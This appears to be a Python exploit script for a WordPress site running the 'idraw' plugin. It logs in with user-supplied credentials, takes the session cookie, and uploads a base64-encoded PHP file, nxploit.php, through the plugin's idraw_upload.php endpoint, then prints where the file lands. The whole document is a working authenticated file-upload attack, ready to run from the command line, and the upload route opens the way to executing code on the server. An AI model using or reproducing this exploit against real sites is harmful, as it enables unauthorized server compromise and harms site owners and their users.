import requests
import base64
import argparse
from urllib.parse import urljoin

# Exploit By | Nxploited ( Khaled Alenazi )

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="Website URL")
parser.add_argument("-un", "--username", required=True, help="Username")
parser.add_argument("-p", "--password", required=True, help="Password")
args = parser.parse_args()

session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

login_url = args.url + '/wp-login.php'
login_data = {
    'log': args.username,
    'pwd': args.password,
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}
headers = {"User-Agent": user_agent}
response = session.post(login_url, verify=False, data=login_data, headers=headers)

logged_cookie = None
for c in session.cookies:
    if 'wordpress_logged_in' in c.name:
        logged_cookie = f"{c.name}={c.value}"
        break

if not logged_cookie:
    print("[❌] Login failed or session cookie not found.")
    exit()
else:
    print(f"[✅] Login successful.")
    print(f"[🍪] Session cookie:\n{logged_cookie}")

php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
encoded_php = base64.b64encode(php_code.encode("utf-8")).decode("utf-8")

upload_url = args.url + "/wp-content/plugins/idraw/idraw_upload.php"
payload = {
    'dataurl': encoded_php,
    'filename': 'nxploit.php',
    'oldfilename': '',
    'logged_in_cookie': logged_cookie
}

upload_response = session.post(upload_url, data=payload, headers=headers)

if "Image is uploaded" in upload_response.text or "nxploit.php" in upload_response.text:
    final_url = args.url + "/wp-content/uploads/2025/4/19/nxploit.php"
    print(f"[✅] File uploaded successfully:\n[🔗] {final_url}")
else:
    print("[❌] File upload failed.")